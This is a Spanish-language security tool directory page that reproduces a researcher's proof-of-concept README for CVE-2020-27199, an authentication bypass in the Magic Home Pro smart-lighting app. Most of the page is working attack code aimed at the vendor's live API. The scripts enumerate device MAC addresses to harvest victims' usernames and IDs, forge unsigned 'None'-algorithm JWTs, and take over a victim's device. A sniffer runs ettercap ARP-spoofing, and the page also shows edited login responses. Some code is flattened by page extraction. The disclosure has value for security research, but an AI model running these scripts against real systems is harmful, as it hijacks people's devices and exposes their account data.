Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-27199 — CVE-2020-27199 | Kitploit
Herramientas/GitHubGitHub/9lyph/cve-2020-27199
ReconocimientoSeguridad IoTExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónSeguridad MóvilAutenticaciónDesarrollo de Payloads
GitHub9lyph/cve-2020-27199

CVE-2020-27199

CVE-2020-27199

7hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
Compartir

CVE-2020-27199 (Magic Home Pro - Bypass de Autenticación)

magic-home-pro

Se encontraron múltiples vulnerabilidades en la aplicación móvil Magic Home Pro, que se utiliza para interactuar con el JadeHomic Kit RGB de Tira LED. La más significativa de estas vulnerabilidades es un bypass de autenticación (CVE-2020-27199), que en última instancia permite la toma total y el control de todo el grupo de dispositivos de una víctima.

  • A continuación se detallan los pasos de enumeración que conducen a la explotación final y el material PoC utilizado para llevar a cabo la enumeración y el exploit final.

PoC Files

magichome-forge.py - Forjador de JWT, utilizado para automatizar la toma de dispositivos

magichome-sniffer.py - Sniffer de red local que busca en la red dispositivos susceptibles. Construye una lista de dispositivos contra los cuales se pueden ejecutar ataques

magichome-switch.py - Permite encender los dispositivos

magichome-takeover.py - Payload que permite la toma exitosa de la cuenta de un usuario

Trabajo previo al descubrimiento

  • Android rooteado
  • Bypass de detección de root mediante parcheo, refirmado del JAR y reconstrucción del APK (requerido)
  • Bypass de fijación de certificados Frida al rescate (requerido)

Aplicación

Magic Home Pro

Proveedor del producto

JadeHomic

Propietario del controlador WiFi

Suzhou SmartChip Semiconductor Co.,Ltd

Sitio web del proveedor

JadeHomic

Referencias

Mitre

Exploit-db

SpiderLabs Blog

Código base del producto afectado

Magic Home Pro

Descripción

URL base: wifij01us.magichue.net

Enumeración

Esta vulnerabilidad permite que cualquier usuario autenticado utilice su nivel de autorización actual para interrogar endpoints que no forman parte de sus productos registrados, mediante una llamada API a /app/getBindedUserListByMacAddress/ZG001?macAddress=<mac address>. Esto da como resultado una respuesta HTTP que indica la existencia del endpoint y devuelve el Nombre de Usuario, el Identificador Único de Usuario (userUniID) y el ID Único Vinculado (bindedUniID) del endpoint asociado.

Usando la interrogación anterior, un atacante puede entonces utilizar una solicitud POST no autorizada a la API /app/sendCommandBatch/ZG001, utilizando la dirección MAC recién enumerada para enviar comandos al endpoint remoto usando comandos hexadecimales compatibles 71230fa3 y 71240fa4 que resultan en ENCENDIDO y APAGADO respectivamente.

Forjado de JWT basado en los detalles obtenidos anteriormente

Una vez completada la enumeración inicial, también es posible forjar un JWT utilizando los campos userID y uniID dentro de los datos del payload del JWT, degradando efectivamente el token para usar 'None' como algoritmo en la sección del encabezado del JWT (vulnerabilidad de bypass de firma). Usando esta vulnerabilidad, la aplicación es susceptible a la toma de dispositivos por parte de un atacante mediante el uso de la llamada API remota a /app/shareDevice/ZG001 y utilizando el parámetro JSON friendUserID para agregar el dispositivo a la lista de dispositivos del atacante, dando al atacante el control total del dispositivo endpoint.

Créditos:

  • Medium
  • JWT_TOOL - ticarpi

Tipo de vulnerabilidad

  • Bypass de autenticación
  • Divulgación de información
  • Acceso no autorizado
  • Escalada horizontal de privilegios

Información adicional

OUI

El OUI describe el Identificador Único de Organización para las direcciones MAC registradas en una organización. En el caso de JadeHomic, el OUI mágico es C8:2E:47, donde los primeros tres bytes corresponden al fabricante y los segundos tres bytes corresponden al número de serie asignado por el fabricante. En nuestro caso, el identificador del fabricante está registrado en Suzhou SmartChip Semiconductor Co., LTD.

Otro impacto del CVE

Permite el bypass de autenticación de la aplicación móvil Magic Home Pro y, por lo tanto, el control total de todo el grupo de dispositivos de un usuario víctima.

Vectores de ataque

  • Usuario autenticado requerido
  • Enumeración exitosa del sistema final existente
  • Envío posterior de comandos por lotes a un endpoint remoto
  • Toma de control del dispositivo
  • Bypass de autenticación

Enumerador PoC y exploit de comandos por lotes

La prueba de concepto enumera los últimos bytes dentro del rango de MAC y devuelve resultados. Permite probar la 'ejecución remota' si te sientes audaz.``` import requests import json import os from colorama import init from colorama import Fore, Back, Style import re

'''

  1. First Stage Authentication
  2. Second Stage Enumerate
  3. Third Stage Remote Execute '''

global found_macaddresses found_macaddresses = [] global outtahere outtahere = "" q = "q" global token

def turnOn(target, token):

root@kitploit:~
urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
array = {
    "dataCommandItems":[
        {"hexData":"71230fa3","macAddress":target}
    ]
}
data = json.dumps(array)
headersOn = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}
print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOn, data=data, headers=headersOn)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def turnOff(target, token):

root@kitploit:~
urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
array = {
    "dataCommandItems":[
        {"hexData":"71240fa4","macAddress":target}
    ]
}
data = json.dumps(array)
headersOff = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}
print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOff, data=data, headers=headersOff)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def lighItUp(target, token):

root@kitploit:~
outtahere = ""
q = "q"
if len(str(target)) < 12:
    print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
    while outtahere.lower() != q.lower():
        if outtahere == "0":
            turnOn(target, token)
        elif outtahere == "1":
            turnOff(target, token)
        outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)

def Main(): urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"

root@kitploit:~
data = {
    "userID":"<Valid Registered Email/Username>",
    "password":"<Valid Registered Password>",
    "clientID":""
}

headersAuth = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

# First Stage Authenticate

os.system('clear')
print (Fore.WHITE + "[+] Authenticating ...")
response = requests.post(urlAuth, json=data, headers=headersAuth)
resJsonAuth = response.json()
token = (resJsonAuth['token'])

# Second Stage Enumerate

print (Fore.WHITE + "[+] Enumerating ...")
macbase = "C82E475DCE"
macaddress = []
a = ["%02d" % x for x in range(100)]
for num in a:
    macaddress.append(macbase+num)

with open('loot.txt', 'w') as f:
    for mac in macaddress:
        urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
        params = {
            "macAddress":mac
        }

        headersEnum = {
            "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
            "Accept-Language": "en-US",
            "Content-Type": "application/json; charset=utf-8",
            "Accept": "application/json",
            "token": token,
            "Host": "wifij01us.magichue.net",
            "Connection": "close",
            "Accept-Encoding": "gzip, deflate"
        }

        response = requests.get(urlEnum, params=params, headers=headersEnum)
        resJsonEnum = response.json()
        data = (resJsonEnum['data'])
        if not data:
            pass
        elif data:
            found_macaddresses.append(mac)
            print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
            f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
        else:
            print (Fore.RED + "[-] No results found!")
            print(Style.RESET_ALL)

    if not found_macaddresses:
        print (Fore.RED + "[-] No MAC addresses retrieved")
    elif found_macaddresses:
        attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
        if (attackboolean.upper() == 'Y'):
            target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
            lighItUp(target, token)
        elif (attackboolean.upper() == 'N'):
            print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
        else:
            print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)

if name == "main": Main()

root@kitploit:~
#### Enumeración

![](https://assets.kitploit.com/production/public/readmes/14851/313dec37a245a36b311ba83f9bf03637209ab4b4bf5b0b51c283e53618544cfc.jpg)

#### Forja de tokens

##### Forjador de tokens PoC

- Usando el **userID** y **uniqID** obtenidos tras una enumeración exitosa. Este forjador de tokens PoC genera un nuevo JWT firmado y evadido.```
#!/usr/local/bin/python3

import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re
import time
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime

now = datetime.now()
stamp = mktime(now.timetuple())

'''
HTTP/1.1 200
Server: nginx/1.10.3
Content-Type: application/json;charset=UTF-8
Connection: close

"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
'''

def Usage():
    print (f"Usage: {sys.argv[0]} <username> <unique id>")

def Main(user, uniqid):
    os.system('clear')
    print ("[+] Encoding ...")
    print ("[+] Bypass header created!")
    print ("HTTP/1.1 200")
    print ("Server: nginx/1.10.3")
    print ("Date: "+str(format_date_time(stamp))+"")
    print ("Content-Type: application/json;charset=UTF-8")
    print ("Connection: close\r\n\r\n")

    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
    jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
    jwt_headerEncoded = url64.encode(jwt_header.strip())
    jwt_dataEncoded = url64.encode(jwt_data.strip())
    jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
    print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        Usage()
    else:
        Main(sys.argv[1], sys.argv[2])

Toma de Control del Dispositivo

  • Exploit para tomar el control del dispositivo que utiliza el correo electrónico del atacante (una cuenta registrada que se usará para tomar el control de la cuenta objetivo), correo electrónico objetivo (la cuenta a ser tomada), dirección MAC objetivo (asociada a la dirección de correo electrónico objetivo) y token falsificado.
PoC de explotación de toma de control del dispositivo```

#!/usr/local/bin/python3

import url64 import requests import json import sys import os from colorama import init from colorama import Fore, Back, Style import re

def Usage(): print (f"Usage: {sys.argv[0]} ")

def Main():

root@kitploit:~
attacker_email = sys.argv[1]
target_email = sys.argv[2]
target_mac = sys.argv[3]
forged_token = sys.argv[4]

os.system('clear')
print (Fore.WHITE + "[+] Sending Payload ...")
url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"

array = {"friendUserID":attacker_email, "macAddress":target_mac}

data = json.dumps(array)

headers = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":forged_token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

response = requests.post(url, data=data, headers=headers)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)

if name == "main": if len(sys.argv) < 5: Usage() else: Main()

root@kitploit:~
##### Ejemplo de intercambio exitoso de solicitud/respuesta POST```
POST Request

POST /app/shareDevice/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token: <forged token, representing the target victim>
Content-Type: application/json; charset=utf-8
Content-Length: 72
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate

{"friendUserID":"<attackercontrolled email>","macAddress":"<victim mac address>"}

Response

HTTP/1.1 200 
Server: nginx/1.10.3
Date: Tue, 07 Jul 2020 05:31:33 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 31

{"code":0,"msg":"","data":true}

Sniffer de Dispositivos Mágicos del Hogar

  • Requisitos:
    • ettercap
    • Credenciales de Usuario Válidas
  • La intención es ejecutar este script contra un segmento de red en el que esté interesado en encontrar dispositivos susceptibles.
  • Una vez encontrados, ejecute un ataque usando el menú de ataques dentro del script.``` #!/usr/bin/env python3

import socket import struct import platform import os import sys import requests import json from colorama import init from colorama import Fore, Back, Style import re import time, subprocess

loot = [] global choice choice = '' global outtahere outtahere = "" q = "q" global macAddress

def scan(): with open('sniffedDevices.txt', 'a+') as f: os.system('clear') print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL ) print (Fore.GREEN + "| Author: Victor Hanna (@9lyph) |"+ Style.RESET_ALL ) print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL ) print (Fore.GREEN + "| (CTRL^C to Quit) |"+ Style.RESET_ALL ) print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL ) print (Fore.WHITE + '[+] Configuring IP Forwarding'+ Style.RESET_ALL ) time.sleep(5) print (Fore.WHITE + '[+] Setting up MiTM'+ Style.RESET_ALL ) time.sleep(2) ipForward = subprocess.Popen('sudo echo 1 > /proc/sys/net/ipv4/ip_forward', shell=True) time.sleep(2) ettercap = subprocess.Popen('sudo ettercap -T -q -i eth0 -M arp /// > /dev/null &', shell=True) time.sleep(2) print (Fore.WHITE + '[+] Searching for Magic Home Device(s)'+ Style.RESET_ALL ) itsthere = [] while (True): conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003)) try: raw_data, addr = conn.recvfrom(65535) dst_mac, src_mac, proto, data = ethernet_frame(raw_data) if 'FF:FF:FF:FF:FF:FF' in dst_mac: # Suppress Broadcast traffic pass elif 'c8:2e:47'.upper() in src_mac: if src_mac in loot: pass else: print (Fore.WHITE + '[+] Device ' + src_mac + ' added to loot !'+ Style.RESET_ALL) loot.append(src_mac) f.write(src_mac + "\n") elif 'c8:2e:47'.upper() in dst_mac: if dst_mac in loot: pass else: print (Fore.WHITE + '[+] Device ' + dst_mac + ' added to loot !'+ Style.RESET_ALL) loot.append(dst_mac) f.write(dst_mac + "\n") else: pass except KeyboardInterrupt: print (Fore.WHITE + "[+] Stopping MiTM"+ Style.RESET_ALL) time.sleep(2) subprocess.Popen.kill(ettercap) print (Fore.WHITE + '[+] Reconfiguring IP Forwarding'+ Style.RESET_ALL) time.sleep(2) os.system('sudo echo 0 > /proc/sys/net/ipv4/ip_forward') menu()

def turnOn(target, token): urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" array = { "dataCommandItems":[ {"hexData":"71230fa3","macAddress":target} ] }

root@kitploit:~
data = json.dumps(array)

headersOn = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOn, data=data, headers=headersOn)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Fore.WHITE + f"{target}" + Fore.GREEN + " Switched On" + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def turnOff(target, token): urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"

root@kitploit:~
array = {
    "dataCommandItems":[
        {"hexData":"71240fa4","macAddress":target}
    ]
}

data = json.dumps(array)
headersOff = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOff, data=data, headers=headersOff)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Fore.WHITE + f"{target}" + Fore.GREEN + " Switched Off" + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def lighItUp(target, token): outtahere = "" q = "q" if len(str(target)) < 12: print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL) elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()): print (outtahere.lower()) while outtahere.lower() != q.lower(): if outtahere == "0": turnOn(target, token) elif outtahere == "1": turnOff(target, token) outtahere = input(Fore.GREEN + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL) menu()

def attack(): with open('sniffedDevices.txt', 'rb') as f: os.system('clear') print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL) print (Fore.GREEN + "| Author: Victor Hanna (@9lyph) |"+ Style.RESET_ALL) print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL) print (Fore.GREEN + "| Attack Device : '1' |"+ Style.RESET_ALL) print (Fore.GREEN + "| Exit to Main Menu: '2' |"+ Style.RESET_ALL) print (Fore.GREEN + "| (CTRL^C to Quit) |"+ Style.RESET_ALL) print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL) print (Fore.WHITE + "[+] These are you available local targets:"+ Style.RESET_ALL) alreadyDone = [] for target in f.readlines(): macAddresses = ((target).replace(b":", b"")) if macAddresses in alreadyDone: continue else: alreadyDone.append(macAddresses) print (target.replace(b":", b"").decode('utf-8').strip())

root@kitploit:~
    choice = int(input ("Choice: "))
    if (choice == 1):
        macAddress = input("[+] Enter Device MAC (xxxxxxxxxxxx): ")
        urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"

        data = {
            "userID":"<!--Valid Username-->",
            "password":"<!--Valid Password-->",
            "clientID":""
        }

        headersAuth = {
            "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
            "Accept-Language": "en-US",
            "Accept": "application/json", 
            "Content-Type": "application/json; charset=utf-8",
            "Host": "wifij01us.magichue.net",
            "Connection": "close",
            "Accept-Encoding": "gzip, deflate"
        }
        print (Fore.WHITE + "[+] Authenticating ...")
        response = requests.post(urlAuth, json=data, headers=headersAuth)
        resJsonAuth = response.json()
        token = (resJsonAuth['token'])
        lighItUp(macAddress, token)
    elif (choice == 2):
        menu()
    else:
        attack()

def ethernet_frame(data): dst_mac, src_mac, proto = struct.unpack('!6s6sH', data[:14]) return get_mac_addr(dst_mac), get_mac_addr(src_mac), socket.htons(proto), data[14:]

def get_mac_addr(bytes_addr): bytes_str = map('{:02x}'.format, bytes_addr) return ':'.join(bytes_str).upper()

def menu(): os.system('clear') while (True):

root@kitploit:~
    print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Author: Victor Hanna (@9lyph)       |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Scan   : '1'                        |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Attack : '2'                        |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| (CTRL^C to Quit)                    |"+ Style.RESET_ALL)
    print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL)
    try:
        choice = (input ("Choice: "))
        if (int(choice) == 1):
            scan()
        elif (int(choice) == 2):
            attack()
    except KeyboardInterrupt:
        os.system ('sudo echo 0 > /proc/sys/net/ipv4/ip_forward')
        print("\nBye bye !\n")
        sys.exit()

if name == 'main': menu()

root@kitploit:~
### Bypass de Autenticación (Magic Home Pro) (CVE-2020-27199)
 
- Utilizando la falsificación de tokens JSON junto con la información obtenida, es decir, el correo electrónico de la víctima, el ClientID y el UniqID basados en la enumeración anterior, es posible eludir el proceso de autenticación de la aplicación móvil manipulando la respuesta HTTP y, por lo tanto, obtener acceso a la aplicación como la víctima.

- El atacante utiliza la aplicación Magic Home Pro empleando una dirección de correo electrónico de la víctima, una contraseña arbitraria y un clientID.

- El atacante puede entonces manipular la respuesta HTTP utilizando los detalles del paso 1, lo que permite que se produzca el bypass.```
Original HTTP Login Request via Magic Home Pro Mobile app
 
POST /app/login/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token:
Content-Type: application/json; charset=utf-8
Content-Length: 117
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate
 
{"userID":"<victim userID>","password":"<arbitrary password>","clientID":"<arbitrary ClientID>"}

Original HTTP Response
 
HTTP/1.1 200
Server: nginx/1.10.3
Date: Thu, 08 Oct 2020 00:08:45 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 37
 
{"code":10033,"msg":"Password error"}

Edited HTTP Response
 
HTTP/1.1 200
Server: nginx/1.10.3
Date: Mon, 06 Jul 2020 12:32:02 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 907
 
{"code":0,"msg":"","data":{"webApi":"wifij01us.magichue.net/app","webPathOta":"http://wifij01us.magichue.net/app/ota/download","tcpServerController":"TCP,8816,ra8816us02.magichue.net","tcpServerBulb":"TCP,8815,ra8815us02.magichue.net","tcpServerControllerOld":"TCP,8806,mhc8806us.magichue.net","tcpServerBulbOld":"TCP,8805,mhb8805us.magichue.net","sslMqttServer":"ssl://192.168.0.112:1883","serverName":"Global","serverCode":"US","userName":"<victim userID>","userEmail":"<victim email>","userUniID":"<uniID gleaned from enumeration>"},"token":"<forged JWT based on gleaned data from API call>"}

Video Exploit PoC

Magic Home PRO - Exploit

Descubridor/Crédito:

Victor Hanna de Exploit Security

Sígueme en

Mastodon Linkedin Youtube

Descargar herramienta